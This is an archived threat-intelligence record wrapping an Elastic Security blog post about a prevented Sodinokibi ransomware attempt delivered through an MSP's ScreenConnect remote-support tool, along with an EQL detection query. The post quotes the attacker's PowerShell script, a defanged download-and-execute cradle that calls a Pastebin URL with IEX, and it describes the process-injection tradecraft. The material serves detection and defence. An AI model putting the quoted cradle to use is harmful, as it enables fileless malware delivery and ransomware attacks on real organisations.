{
	"id": "502ba569-34e2-4c52-8550-69391519b209",
	"created_at": "2026-04-10T03:21:12.622238Z",
	"updated_at": "2026-04-10T03:22:16.868472Z",
	"deleted_at": null,
	"sha1_hash": "07ad50baa473e3e876c4b0a6e58aeaefc55e8b0e",
	"title": "Ransomware, interrupted: Sodinokibi and the supply chain",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 964125,
	"plain_text": "Ransomware, interrupted: Sodinokibi and the supply chain\r\nBy David French\r\nPublished: 2022-06-02 · Archived: 2026-04-10 02:48:06 UTC\r\nLast month, the Elastic Security Protections Team prevented an attempted ransomware attack targeting an\r\norganization monitored by one of our customers, an IT Managed Service Provider (MSP). We analyzed the alerts\r\nthat were generated after an adversary’s process injection attempts were prevented by Elastic Endpoint Security on\r\nseveral endpoints. Adversaries often attempt to inject their malicious code into a running process before\r\nencrypting and holding the victim’s data to ransom.\r\nThe behavior we observed in this case is consistent with reports of malicious actors, who have targeted MSPs in\r\norder to deploy ransomware at an enterprise scale. By abusing the trust relationships between MSPs and their\r\ncustomers, attacks of this nature scale in impact — capable of crippling small businesses, interfering with\r\ntransportation, or even disrupting a critical municipal public service.\r\nIt is important to note in this case that the adversary accessed the target environment via another MSP, who is not\r\nan Elastic Security customer — we do not have specific details about that environment or how it may have been\r\ncompromised.\r\nIn this post, we’ll discuss the malicious behavior that we observed and prevented, why this attack is often\r\nsuccessful in the wild, and what you can do to reduce the effectiveness of this type of attack in your enterprise.\r\nElastic Security Intelligence and Analytics, a team within Elastic Security Engineering, uses\r\nanonymized security telemetry from participating customers to track threats and improve products, a\r\nfunction that includes collecting alert metadata. By monitoring patterns of events affecting many\r\ncustomers, we’re able to make time-sensitive decisions that improve our ability to mitigate emerging\r\nthreats or provide the community with essential information.\r\nPreventing malicious process injection\r\nThe earliest evidence of compromise was detected when several process injection attempts were prevented.\r\nProcess injection can be used to execute code in the address space of a running process. Adversaries often execute\r\nthis technique in an attempt to avoid detection by security products, or to run their malicious code in a process\r\nrunning at a higher integrity level to elevate their privileges.\r\nProcess Injection alerts in the Elastic Endpoint Security platform\r\nhttps://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain\r\nPage 1 of 5\n\nAnalyzing the process injection alerts established that PowerShell, a powerful native scripting framework, was\r\nleveraged in an attempt to inject shellcode into itself — a behavior that is usually malicious. The powershell.exe\r\nprocess was created as a descendant of ScreenConnect.WindowsClient.exe — a remote desktop support\r\napplication. This type of software is used to allow IT administrators to connect to remote computers and provide\r\nsupport to end users, but applications like this are often abused by adversaries — a tactic known as “living off the\r\nland.”\r\nThe figure below depicts the unusual process lineage associated with this case in Resolver™, our visualization\r\nthat displays events associated with an attack.\r\nResolver™ showing the process lineage associated with the Process Injection attempt\r\nNotice that cmd.exe and powershell.exe are both descendants of the ScreenConnect.WindowsClient.exe process.\r\nThis is suspicious considering their ability to execute malicious commands or scripts, but in isolation this does not\r\nnecessarily indicate malicious activity. Baselining your environment and understanding normal process\r\nrelationships in your enterprise is crucial to hunting for, detecting, or responding to malicious behavior.\r\nIn this case, reviewing the processes and their command line arguments revealed that the adversary leveraged\r\nScreenConnect remote desktop software to connect and copy a batch file to the target endpoint. Examining one of\r\nthe cmd.exe processes in Resolver™ showed that the batch file contained a Base64-encoded PowerShell script\r\nthat was subsequently executed.\r\nDetecting and preventing unwanted behaviors with EQL\r\nWhile this potential target protected by Elastic Endpoint Security avoided an expensive ransomware outbreak,\r\nmany MSPs are still coming to grips with this methodology. This adversary understands that service providers\r\noften have implicit trust with their customers and that makes providers of all kinds valuable.\r\nOnce an adversary has obtained initial access to their target environment, it is typical for them to seek out and\r\nabuse implicit trust relationships as seen in this case. The victim organization trusts the connections to their\r\nhttps://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain\r\nPage 2 of 5\n\nenvironment from their MSP via the remote desktop support application, which introduces the risk of supply chain\r\ncompromise.\r\nWhen considering how to monitor and defend these trust relationships, focusing on applications that connect from\r\nthe trusted party into your network is a good starting point. Blacklisting descendant processes of ScreenConnect\r\nmay not be a viable solution to prevent this malicious behavior, as this may prevent legitimate support personnel\r\nfrom being effective. However, a security monitoring team may decide that a descendant process of\r\nScreenConnect that is using the network is suspicious and want to detect and prevent that behavior. This is\r\npossible using Elastic’s Event Query Language (EQL) and is a generic approach to developing environmental\r\nawareness.\r\nThe following EQL query searches for a sequence of two events that are tied together using the process’s unique\r\nprocess ID (PID). The first event looks for a process that is a descendant of ScreenConnect*.exe. The second\r\nevent looks for network activity from the descendant process. This query can easily be expanded to include other\r\nremote access software or filter expected activity in your environment.\r\nsequence by unique_pid\r\n [process where descendant of [process where process_name == \"ScreenConnect*.exe\"]]\r\n [network where true]\r\nWith Elastic Endpoint Security, it is also possible to configure a Reflex response action, which is a way for\r\ncustomers to implement their own custom prevention rules. For example, we can kill the descendant process when\r\nit establishes a network connection, which would prevent additional malicious code from being downloaded or\r\ncommand and control activity.\r\nConfiguring a Reflex response action in the Elastic Endpoint Security platform\r\nElastic Endpoint Security ships with hundreds of our own behavior-based analytics that include ways to detect and\r\nprevent abnormal process relationships involving third-party administrative tools or binaries that are native to the\r\nhttps://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain\r\nPage 3 of 5\n\nWindows, MacOS, or Linux operating systems.\r\nAnalysis of adversary tradecraft\r\nThe PowerShell script that was executed checked the processor architecture before utilizing the .NET WebClient\r\nclass to download content from Pastebin and the Invoke-Expression (IEX) cmdlet to execute code. This is a\r\npopular technique amongst adversaries for downloading and executing code via PowerShell.\r\nPastebin is a plain text hosting and sharing service where legitimate users often share code snippets. However,\r\nmalicious actors utilize Pastebin and similar websites to store malicious code or publish leaked credentials.\r\nIf ($ENV:PROCESSOR_ARCHITECTURE - contains 'AMD64') {\r\n Start - Process - FilePath \"$Env:WINDIR\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" - argument \"IEX ((\r\n} else {\r\n IEX ((new - object net.webclient).downloadstring('https://pastebin[.]com/raw/[REDACTED]'));\r\n Invoke - LJJJIWVSRIMKPOD;\r\n Start - Sleep - s 1000000;\r\n}\r\nPowerShell script that downloaded content1 from pastebin.com\r\nThis behavior is often categorized as a fileless or in-memory attack due to zero or minimal disk activity that\r\noccurs on the endpoint. When the Elastic Endpoint Security agent detects a fileless attack, it automatically collects\r\nand extracts the staged injected code and strings. This feature ensured that we had full visibility into the behavior\r\nbeing prevented.\r\nSearching VirusTotal for some of the collected strings surfaced several specimens from the Sodinokibi\r\nransomware family.\r\nThe following specific toolmarks and behaviors indicate that this activity is consistent with the execution of the\r\nSodinokibi or Gandcrab ransomware specimens as reported by BleepingComputer and Cynet:\r\nThe malicious actor utilized ScreenConnect remote desktop support software to connect from a\r\ncompromised MSP to the target enterprise.\r\nScreenConnect was used to copy a batch script to the endpoints, which contained a PowerShell script to\r\ndownload and inject malicious code from Pastebin.\r\nThe PowerShell script contained cmdlets and strings (e.g., Invoke-LJJJIWVSRIMKPOD and Start-Sleep)\r\nthat have been observed in other Sodinokibi ransomware campaigns.\r\nThe strings that were collected from the injected threads are consistent with Sodinokibi ransomware\r\nsamples that were submitted to VirusTotal within the last 24 hours.\r\nAfter the adversary’s attempt to self-inject shellcode and execute ransomware was prevented, their attack on the\r\ninitial endpoint stopped. After a period of 15 minutes, the adversary returned and attempted to execute the same\r\nprocedures on an additional five endpoints before giving up. All of their attempts to deploy ransomware were\r\nprevented.\r\nhttps://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain\r\nPage 4 of 5\n\nConclusion\r\nIn this post, we discussed a real-world case of a malicious actor abusing trusted relationships between an MSP and\r\nits customers and attempting to deploy ransomware. This highlights the importance of understanding the\r\nrelationships that your organization has with third parties and the potential impact if those connections are abused.\r\nAnalyzing the alerts revealed that the adversary connected to the customer’s environment via remote desktop\r\nsupport software and executed a malicious script with the intention of downloading, injecting, and executing\r\nransomware. All of the adversary’s attempts were prevented.\r\nThis case also demonstrates the importance of having a layered approach to security and being able to detect and\r\nprevent adversary behavior and fileless attacks. We dissected the attackers procedures and showed how EQL and\r\nReflex can be used to create custom rules and responses.\r\nLooking only for malicious files is not enough; Elastic Endpoint Security provides several layers of behavior-based protections against ransomware, fileless attacks, phishing, exploits, and adversary behavior.\r\nEQL support is being added to Elasticsearch.\r\n1 — The content has since been removed from Pastebin by its creator or the Pastebin staff\r\nSource: https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain\r\nhttps://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain"
	],
	"report_names": [
		"ransomware-interrupted-sodinokibi-and-the-supply-chain"
	],
	"threat_actors": [],
	"ts_created_at": 1775791272,
	"ts_updated_at": 1775791336,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/07ad50baa473e3e876c4b0a6e58aeaefc55e8b0e.pdf",
		"text": "https://archive.orkl.eu/07ad50baa473e3e876c4b0a6e58aeaefc55e8b0e.txt",
		"img": "https://archive.orkl.eu/07ad50baa473e3e876c4b0a6e58aeaefc55e8b0e.jpg"
	}
}